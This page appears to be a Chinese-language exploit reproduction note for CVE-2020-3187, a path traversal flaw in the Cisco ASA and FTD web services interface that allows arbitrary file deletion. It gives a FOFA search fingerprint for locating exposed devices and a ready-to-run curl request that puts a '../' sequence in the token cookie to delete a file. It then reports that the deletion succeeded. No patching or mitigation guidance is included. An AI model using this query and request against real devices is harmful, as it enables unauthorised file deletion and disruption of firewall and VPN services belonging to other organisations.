menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Cisco chevron_right CISCO ASA设备任意文件删除漏洞 CVE-2020-3187.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CISCO ASA设备任意文件删除漏洞 CVE-2020-3187.md
    964 B / 2021-04-15 12:15:25
        # CISCO ASA设备任意文件删除漏洞 CVE-2020-3187
    
    ## 漏洞描述
    
    Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞,该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。
    
    ## 漏洞影响
    
    Cisco ASA设备
    
    ![](image/cisco-1.png)
    
    Cisco FTD设备
    
    ![](image/cisco-2.png)
    
    ## FOFA
    
    > [!NOTE]
    >
    > /+CSCOE+/
    >
    > Cisco-ASA
    
    ## 漏洞复现
    
    访问 http://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html 存在则可能出现此漏洞
    
    ![](image/cisco-6.png)
    
    例如我们删除一张图片  http://xxx.xxx.xxx.xxx/+CSCOU+/csco_logo.gif
    
    ![](image/cisco-7.png)
    
    使用 curl 发送请求
    
    ```shell
    curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html
    ```
    
    ![](image/cisco-8.png)
    
    成功删除图标
    
    links
    file_download